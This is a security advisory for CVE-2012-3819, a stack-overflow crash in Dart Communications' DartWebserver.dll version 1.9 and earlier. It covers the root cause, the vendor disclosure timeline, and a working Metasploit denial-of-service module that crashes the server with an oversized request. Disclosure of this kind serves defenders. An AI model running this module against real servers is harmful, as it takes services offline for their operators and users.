Dart Communications Stack Overflow

2012-10-02T00:00:00
ID PACKETSTORM:117060
Type packetstorm
Reporter catatonicprime
Modified 2012-10-02T00:00:00

Description

                                        
                                            `Overview  
===============  
DartWebserver.Dll is an HTTP server provided by Dart Comunications  
(dart.com). It is distributed intheir PowerTCP/Webserver For ActiveX  
product and likely other similar products.  
  
"Build web applications in any familiar software development  
environment. Use WebServer for ActiveX to add web-based access to  
traditional compiled applications."  
  
Version 1.9 and prior is vulnerable to a stack overflow exception,  
these maybe generated by producing large requests to the application,  
e.g. "a" * 5200000 + "\n\n"  
  
Analysis  
===============  
During the processing of incoming HTTP requests the server collects  
data until it encounters a "\n\n" sentinel. If the request is large,  
multiple copies are made and stored on the stack, this consumes the  
amount of stack space available to the process quickly, leading to a  
stack overflow exception being thrown. This exception is not handled  
and will typically lead to the termination of the parent process. Some  
variations may exist per system depending on pre-existing memory  
conditions and modification of Proof Of Concept (PoC) code may be  
necessary to reproduce the exception.  
  
Timeline  
===============  
10/20/2011 - Discovered the bug in an affected vendor application  
10/20/2011 - Contacted affected vendor  
10/21/2011 - Affected vendor replies stating they can not get the  
product vendor to create a fix  
06/29/2012 - CVE assignment  
08/08/2012 - Contacted product vendor providing specifics  
08/20/2012 - Product vendor created an issue number (#5654) for the  
bug, but reply "there are not immediate plans to resolve the issue"  
09/28/2012 - Posting to bugtraq, for the first time ever ;-)  
  
PoC (MSF Module)  
===============  
require 'msf/core'  
  
class Metasploit3 < Msf::Auxiliary  
include Msf::Exploit::Remote::Tcp  
include Msf::Auxiliary::Dos  
  
def initialize(info = {})  
super(update_info(info,  
'Description' => %q{ 'Name' => 'Dart Webserver  
<= 1.9.0 Stack Overflow',  
Dart Webserver from Dart Communications throws a stack  
overflow exception  
when processing large requests.  
}  
,  
'Author' => [  
'catatonicprime'  
],  
'Version' => '$Revision: 15513 $',  
'License' => MSF_LICENSE,  
'References' => [  
[ 'CVE', '2012-3819' ],  
],  
'DisclosureDate' => '9/28/2012'))  
  
register_options([  
Opt::RPORT(80),  
OptInt.new('SIZE', [ true, 'Estimated stack size to exhaust',  
'520000' ])  
])  
end  
def run  
serverIP = datastore['RHOST']  
if (datastore['RPORT'].to_i != 80)  
serverIP += ":" + datastore['RPORT'].to_s  
end  
size = datastore['SIZE']  
  
print_status("Crashing the server ...")  
request = "A" * size + "\r\n\r\n"  
connect  
sock.put(request)  
disconnect  
  
end  
end  
`